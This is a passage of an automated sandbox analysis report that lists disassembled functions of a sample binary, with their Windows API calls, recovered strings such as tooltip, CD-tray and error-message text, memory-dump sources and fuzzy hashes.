                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0033A42C
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0033A444
                                                                                                                      • Part of subcall function 002B25DB: GetWindowLongW.USER32(?,000000EB), ref: 002B25EC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                    • Opcode ID: ea7470a0cce9857f0b87242a11000a2de1a24548d2bbfab09f544451067a9958
                                                                                                                    • Instruction ID: 515c79250a6bd0b46a1ae443a7fdd44a55201ab7945bc3ebda07cacb5905a72a
                                                                                                                    • Opcode Fuzzy Hash: ea7470a0cce9857f0b87242a11000a2de1a24548d2bbfab09f544451067a9958
                                                                                                                    • Instruction Fuzzy Hash: 5371AC71640704AFD726CF28CC89FAA7BE9FB88304F45452DF985872A0C7B0E942CB52
                                                                                                                    Function 00334392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00334424
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0033446F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                    • Opcode ID: 0cf13e15ee60fc3f46f108d8b059f3b81a094035a68bf117680483fad6f23aac
                                                                                                                    • Instruction ID: 5f7a3220c4f6db6349a0cdbde2a40bd512e9a87168f72e9cc74220f2094b2f93
                                                                                                                    • Opcode Fuzzy Hash: 0cf13e15ee60fc3f46f108d8b059f3b81a094035a68bf117680483fad6f23aac
                                                                                                                    • Instruction Fuzzy Hash: 28919E742143019FCB05EF10C492BAEB7E5AF96390F058869F9925B7A2CB30FD59CB81
                                                                                                                    Function 0033B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0033B8B4
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003391C2), ref: 0033B910
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0033B949
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0033B98C
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0033B9C3
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0033B9CF
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0033B9DF
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,003391C2), ref: 0033B9EE
                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0033BA0B
                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0033BA17
                                                                                                                      • Part of subcall function 002D2EFD: __wcsicmp_l.LIBCMT ref: 002D2F86
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                    • Opcode ID: 28b7bbaa14a77ea5649d1e18f22b20953e2ac4c81a34230c5ce0e9bf51a2f71f
                                                                                                                    • Instruction ID: e9574b9ccebfb864ce0802afacbea693d5a44fb3dfbecb9833788bc962e81478
                                                                                                                    • Opcode Fuzzy Hash: 28b7bbaa14a77ea5649d1e18f22b20953e2ac4c81a34230c5ce0e9bf51a2f71f
                                                                                                                    • Instruction Fuzzy Hash: 7761DF71900219FEEB16DF64CC81FBEBBACEB08710F108516FA15DA1D1DB75A990DBA0
                                                                                                                    Function 0031DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0031DCDC
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0031DCEC
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0031DCF8
                                                                                                                    • __wsplitpath.LIBCMT ref: 0031DD56
                                                                                                                    • _wcscat.LIBCMT ref: 0031DD6E
                                                                                                                    • _wcscat.LIBCMT ref: 0031DD80
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0031DD95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DDA9
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DDDB
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DDFC
                                                                                                                    • _wcscpy.LIBCMT ref: 0031DE08
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0031DE47
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 3566783562-438819550
                                                                                                                    • Opcode ID: 50edea8f028251d44188a7af02b17086dd8e5ad6439579458b9c1efaf2214148
                                                                                                                    • Instruction ID: c4005ec864113ca6af2be57af66e3230342da492ccb665ab8560f30c04e3ba0d
                                                                                                                    • Opcode Fuzzy Hash: 50edea8f028251d44188a7af02b17086dd8e5ad6439579458b9c1efaf2214148
                                                                                                                    • Instruction Fuzzy Hash: 306159765042059FCB15EF20C8849EEB3E8BF8A314F04892AF98987251DB31E995CF92
                                                                                                                    Function 00319C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00319C7F
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00319CA0
                                                                                                                    • __swprintf.LIBCMT ref: 00319CF9
                                                                                                                    • __swprintf.LIBCMT ref: 00319D12
                                                                                                                    • _wprintf.LIBCMT ref: 00319DB9
                                                                                                                    • _wprintf.LIBCMT ref: 00319DD7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 311963372-3080491070
                                                                                                                    • Opcode ID: e5cd52e426100b92a971f27dcb19abb04a7b6e13863b05aa70fc5983c40ad5c6
                                                                                                                    • Instruction ID: eb2b272f983b421311352756b163ea8ac80d988cb940d7bf5e1896e7ae2c32cd
                                                                                                                    • Opcode Fuzzy Hash: e5cd52e426100b92a971f27dcb19abb04a7b6e13863b05aa70fc5983c40ad5c6
                                                                                                                    • Instruction Fuzzy Hash: 5751B431910509AECF1AEBE0DD56EEEB778AF08340F500566F505720A2DB316FA9CF61
                                                                                                                    Function 0031A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0031A3CB
                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0031A418
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031A460
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031A497
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031A4C5
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                    • Opcode ID: 90ceae1f2018c239dd6c833023047f80957a856f1a87785c38ccacec3c6b6545
                                                                                                                    • Instruction ID: 165cf7736a737f02faa28d2eedc5bc1b2ad6fcfb070d36ea4bd69aaac8bddc73
                                                                                                                    • Opcode Fuzzy Hash: 90ceae1f2018c239dd6c833023047f80957a856f1a87785c38ccacec3c6b6545
                                                                                                                    • Instruction Fuzzy Hash: EB518E711147049FC705EF20C8819AAB7F8EF98758F00896DF896972A1DB31ED5ACF82
                                                                                                                    Function 0030F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,002EE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0030F8DF
                                                                                                                    • LoadStringW.USER32(00000000,?,002EE029,00000001), ref: 0030F8E8
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,002EE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0030F90A
                                                                                                                    • LoadStringW.USER32(00000000,?,002EE029,00000001), ref: 0030F90D
                                                                                                                    • __swprintf.LIBCMT ref: 0030F95D
                                                                                                                    • __swprintf.LIBCMT ref: 0030F96E
                                                                                                                    • _wprintf.LIBCMT ref: 0030FA17
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0030FA2E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                    • Opcode ID: 1327bd096a5db0f788ed318c494a64cee328a6fa27f29426edc102fa35e63eaa
                                                                                                                    • Instruction ID: 183d179a350bc18c9d657d2deab512bb69d4cf9a295501338ce276c5b795c0e3
                                                                                                                    • Opcode Fuzzy Hash: 1327bd096a5db0f788ed318c494a64cee328a6fa27f29426edc102fa35e63eaa
                                                                                                                    • Instruction Fuzzy Hash: 08416B72910219AACF15FBE0CD96EEEB77CAF58340F500065F505B6092EB316F29CEA1
                                                                                                                    Function 0033BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00339207,?,?), ref: 0033BA56
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BA6D
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BA78
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BA85
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0033BA8E
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BA9D
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0033BAA6
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BAAD
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BABE
                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00342CAC,?), ref: 0033BAD7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0033BAE7
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0033BB0B
                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0033BB36
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0033BB5E
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0033BB74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 9174630da458fe190ec0d0d922bbbbc01a87d2c8eb129f4148faaf151855a40f
                                                                                                                    • Instruction ID: f4f901b505991855402bbd5b146f113743ce9dc532ab751c773cc4cf709fd03e
                                                                                                                    • Opcode Fuzzy Hash: 9174630da458fe190ec0d0d922bbbbc01a87d2c8eb129f4148faaf151855a40f
                                                                                                                    • Instruction Fuzzy Hash: 09410975A00204EFDB129F65DC88EABBBBCEF89711F514069F909DB260DB309E41DB60
                                                                                                                    Function 0031D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 0031DA10
                                                                                                                    • _wcscat.LIBCMT ref: 0031DA28
                                                                                                                    • _wcscat.LIBCMT ref: 0031DA3A
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0031DA4F
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DA63
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0031DA7B
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0031DA95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DAA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                    • Opcode ID: f63f709f7cfe62ca4ea7315e9522a8c3027434b89a19321be6d2a8cef4bc2e5a
                                                                                                                    • Instruction ID: 3aaf4ac7d4fe862784481884a06e11b327513ca4f748bd311a0a1ff51f722f8a
                                                                                                                    • Opcode Fuzzy Hash: f63f709f7cfe62ca4ea7315e9522a8c3027434b89a19321be6d2a8cef4bc2e5a
                                                                                                                    • Instruction Fuzzy Hash: 8A8193715042459FCB29DF64C8449EEB7E8AF8E350F15892EF88ACB251E734ED84CB52
                                                                                                                    Function 0033C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0033C1FC
                                                                                                                    • GetFocus.USER32 ref: 0033C20C
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0033C217
                                                                                                                    • _memset.LIBCMT ref: 0033C342
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0033C36D
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0033C38D
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0033C3A0
                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0033C3D4
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0033C41C
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0033C454
                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0033C489
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                    • Opcode ID: 3cfe7ec9e1b1abf521860415764739c443f5789640f924ecb2a6355b8ada3c2a
                                                                                                                    • Instruction ID: 36902af04788451f9f2073e09bea50354844a07ce210b68ec579676c715c9106
                                                                                                                    • Opcode Fuzzy Hash: 3cfe7ec9e1b1abf521860415764739c443f5789640f924ecb2a6355b8ada3c2a
                                                                                                                    • Instruction Fuzzy Hash: 3E81AE70618301AFDB26DF25C8D4A6BBBE8FF88714F00592EF995A7291C770D904CB92
                                                                                                                    Function 0032731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0032738F
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0032739B
                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 003273A7
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 003273B4
                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00327408
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00327444
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00327468
                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 00327470
                                                                                                                    • DeleteObject.GDI32(?), ref: 00327479
                                                                                                                    • DeleteDC.GDI32(00000006), ref: 00327480
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0032748B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                    • Opcode ID: 3e1df811181ef815b4881ae641eeaecb3013cde1a118221522ebc698dddc2fda
                                                                                                                    • Instruction ID: e6afa65d93d2f8d5e78195edf77b6a96e1d5a3819c267c404ff36c18cff42c05
                                                                                                                    • Opcode Fuzzy Hash: 3e1df811181ef815b4881ae641eeaecb3013cde1a118221522ebc698dddc2fda
                                                                                                                    • Instruction Fuzzy Hash: D2514975904319EFCB16CFA9DC85EAEBBB9FF48310F14852DF95997220C731A9408B90
                                                                                                                    Function 002B6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002B6B0C,?,00008000), ref: 002D0973
                                                                                                                      • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002B6BAD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B6CFA
                                                                                                                      • Part of subcall function 002B586D: _wcscpy.LIBCMT ref: 002B58A5
                                                                                                                      • Part of subcall function 002D363D: _iswctype.LIBCMT ref: 002D3645
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
